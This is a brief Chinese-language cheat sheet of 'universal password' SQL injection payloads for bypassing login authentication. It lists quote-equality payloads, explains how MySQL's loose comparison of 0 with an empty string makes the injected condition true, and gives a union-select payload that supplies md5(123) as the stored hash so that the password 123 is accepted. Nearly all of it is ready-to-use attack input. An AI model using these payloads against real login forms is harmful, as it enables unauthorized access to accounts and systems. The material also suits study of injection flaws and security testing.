万能密码

1' = '
1' = '0
select * from user where username='1'='' and password='1'=''
username='1'=''这句,先有username='1'返回0,然后再和''比较,mysql中的弱类型比较0和空字符串是相等的,所以能返回1
admin:-1' union select md5(123) #注意联合查询的字段数
pass:123